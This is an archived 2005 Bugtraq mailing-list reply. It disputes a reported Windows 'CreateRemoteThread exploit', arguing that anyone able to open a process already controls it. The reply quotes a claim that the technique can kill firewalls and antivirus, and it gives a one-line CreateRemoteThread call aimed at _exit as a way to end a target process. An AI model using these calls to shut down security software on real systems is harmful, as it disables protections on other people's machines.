| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 2 Dec 2005 06:41:18 -0800 From: "Michael Wojcik" <Michael.Wojcik@...rofocus.com> To: <bugtraq@...urityfocus.com> Subject: RE: Microsoft Windows CreateRemoteThread Exploit > From: q7x@...iyane.com [mailto:q7x@...iyane.com] > Sent: Thursday, 01 December, 2005 05:02 > > Description: > when the one process open with OpenProcess function and > use CreateRemoteThread(Process,0,0,x,0,0,0) then the process crash. > an example hackers can use this method for kill firewalls > and antiviruses If an attacker can successfully call OpenProcess() on a process with arbitrary access, then they can just request PROCESS_TERMINATE access and terminate the process with TerminateProcsss(). Other attacks are obviously possible with other forms of access. I don't see how this particular feature is a vulnerability unless an attacker can somehow perform a successful OpenProcess() but only with PROCESS_CREATE_THREAD access. And even then, why couldn't the attacker just do: CreateRemoteThread(Process, NULL, 0, (LPTHREAD_START_ROUTINE)_exit, NULL, 0, NULL); or indeed create a remote thread with any other useful function the process has mapped? This "exploit" boils down to "if I can make a process call address 0, I can cause an exception in it". Well, sure. If you can make a process execute arbitrary code, you can do all sorts of things. An attacker who can successfully open a security-critical process has already won. -- Michael Wojcik Principal Software Systems Developer, Micro Focus
Powered by blists - more mailing lists